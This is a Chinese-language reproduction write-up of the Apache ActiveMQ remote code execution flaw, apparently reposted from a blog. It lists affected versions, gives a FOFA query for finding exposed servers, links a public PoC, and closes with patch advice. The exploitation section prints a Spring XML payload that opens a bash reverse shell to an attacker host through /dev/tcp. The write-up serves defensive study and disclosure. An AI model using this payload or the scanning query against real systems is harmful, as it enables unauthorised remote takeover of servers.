本文介绍: ActiveMQ是一个开源消息代理集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目用于实现消息中间件,帮助不同的应用程序系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据实现远程代码执行

0x01 产品简介

  ActiveMQ是一个开源消息代理集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序系统之间进行通信

0x02 漏洞概述

 Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据实现远程代码执行

0x03 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16 

0x04 复现环境

FOFA:app=”APACHE-ActiveMQ” &amp;&amp; port=”61616″

b1d19830b3eb42439cf5a379fdb8f821.png

0x05 漏洞复现

PoC地址https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地导入IDEA中运行

74854985a16d47dfae882dd50decf702.png

 直接运行发现报错java: 警告: 源发行版 11 需要目标发行版 11

PS:这种一般是你idea配置文件iml 与 项目中 配置jdk版本是不一致导致的

6cbc9d691fe548ccbca9e68eb61b210d.png

这里需要安装jdk11,配置项目

3a5ae44b65144c05bed9c8d823556339.png

 漏洞利用

修改Main.java以下两处

f48ef75660ff44cb9caa860d0ee83b35.png

反弹shell 

将rce.xml上传至vps

<?xml version="1.0" encoding="UTF-8" ?&gt;
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"&gt;
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >&amp; /dev/tcp/your-ip/6666 0>&amp;1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

利用python开启http服务 

79b958ad02784db9a00e76e8ee75a551.png

nc开启监听

7d5fea03fec84a4b84b45b84922c4465.png

运行Main.java

499c87a5b2c54c4997bf538ca9a717cf.png

成功反弹shell

2618ec354d534345bbf22d0d8b813d8b.png

2adaf923474647acbfcde701749e153f.png

0x06 修复建议 

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求

升级修复方案

目前官方已通过限制序列化类只能为Throwable的子类方式修复此漏洞。建议受影响用户可以更新到:

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16

https://github.com/apache/activemq/tags

原文地址:https://blog.csdn.net/qq_41904294/article/details/134066087

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_9839.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注